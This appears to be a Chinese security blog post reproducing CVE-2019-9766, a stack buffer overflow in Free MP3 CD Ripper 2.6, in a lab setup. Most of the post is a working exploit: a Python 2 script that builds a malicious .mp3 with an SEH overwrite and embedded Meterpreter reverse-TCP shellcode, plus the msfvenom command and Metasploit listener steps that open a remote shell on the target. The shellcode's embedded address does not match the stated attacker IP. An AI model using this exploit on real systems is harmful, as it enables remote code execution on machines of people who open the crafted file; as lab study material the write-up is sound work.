安全响应 | CVE-2019-9766漏洞复现 msf

安全响应 | CVE-2019-9766漏洞复现 msf_第1张图片

0x00 | 漏洞描述

Free MP3 CD Ripper是一款音频格式转换器。Free MP3 CD Ripper 2.6版本中存在栈缓冲区溢出漏洞。远程攻击者可借助特制的.mp3文件利用该漏洞执行任意代码。

 

0x01 | 漏洞细节


CVE-2019-9766曝出了关于Free MP3 CD Ripper的缓冲区溢出漏洞,在转换文件时,Free MP3 CD Ripper 2.6中基于堆栈的缓冲区溢出漏洞允许用户辅助的远程攻击者通过特制的.mp3文件执行任意代码。本文详细描述了该漏洞的验证方法,渗透模块的编写及测试过程。

 

0x02 | 环境准备


环境准备:

攻击机:Kali 2.0 (2019.4)
靶机:Windows 7 SP2 64位版本
环境网络:
攻击机:使用metasploit进行渗透测试
靶机: 安装Free MP3 CD Ripper 2.6版本
攻击机IP:10.0.0.1/8 交换机:10.0.0.254
靶机IP:10.0.0.2/8  交换机:10.0.0.254
#基于冰崖B区服务器cdn

 

 

 

0x03 | 漏洞复现


\0x0 制作反向连接的shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=2333 -f c --smallest

安全响应 | CVE-2019-9766漏洞复现 msf_第2张图片


 

\0x1 替换脚本中的shellcode

buffer = "A" * 4116
NSEH = "\xeb\x06\x90\x90"
SEH = "\x84\x20\xe4\x66"
nops = "\x90" * 5
buf = ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
buf += "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
buf += "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
buf += "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
buf += "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
buf += "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
buf += "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
buf += "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
buf += "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
buf += "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
buf += "\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
buf += "\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x00\xab"
buf += "\x68\x02\x00\x03\x78\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
buf += "\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0"
buf += "\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8"
buf += "\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00"
buf += "\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68"
buf += "\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3"
pad = "B" * (316 - len(nops) - len(buf) )
payload = buffer + NSEH + SEH + nops + buf +pad
try:
    f=open("TestFMCR.mp3","w")
    print "[+] Creating %s bytes mp3 File..." %len(payload)
    f.write(payload)
    f.close()
    print "[+] mp3 File created successfully!"
except:
    print "File cannot be created!"

编写payload,然使用Python2

安全响应 | CVE-2019-9766漏洞复现 msf_第3张图片


 

\0x2 运行脚本,生成payload

安全响应 | CVE-2019-9766漏洞复现 msf_第4张图片


 

并且移动到靶机windows7(装有Freemp3 2.6)上面


\0x3 打开msf并设置监听

msfconsole #打开metasploit
set lhost Your IP #你的IP
set lport You Port #你的端口
set payload windows/meterpreter/reverse_tcp #设置buff的payload
exploit #开启监听

安全响应 | CVE-2019-9766漏洞复现 msf_第5张图片

\0x4 在windows7靶机上面运行软件并播放payload

安全响应 | CVE-2019-9766漏洞复现 msf_第6张图片


 

未响应不要在意,反正meterpreter返回成功了


\0x4 渗透成功!实验结束

安全响应 | CVE-2019-9766漏洞复现 msf_第7张图片


0x04 | 漏洞修复


删除Free MP3 CD Ripper (滑稽) 

 

0x05 | 作者的话


最近忙着学习缓存区Buff,有空的话给大家写一篇关于UAF,删除堆块泄漏heap地址的文章

扫码关注我们!

安全响应 | CVE-2019-9766漏洞复现 msf_第8张图片

你可能感兴趣的:(CVE漏洞复现)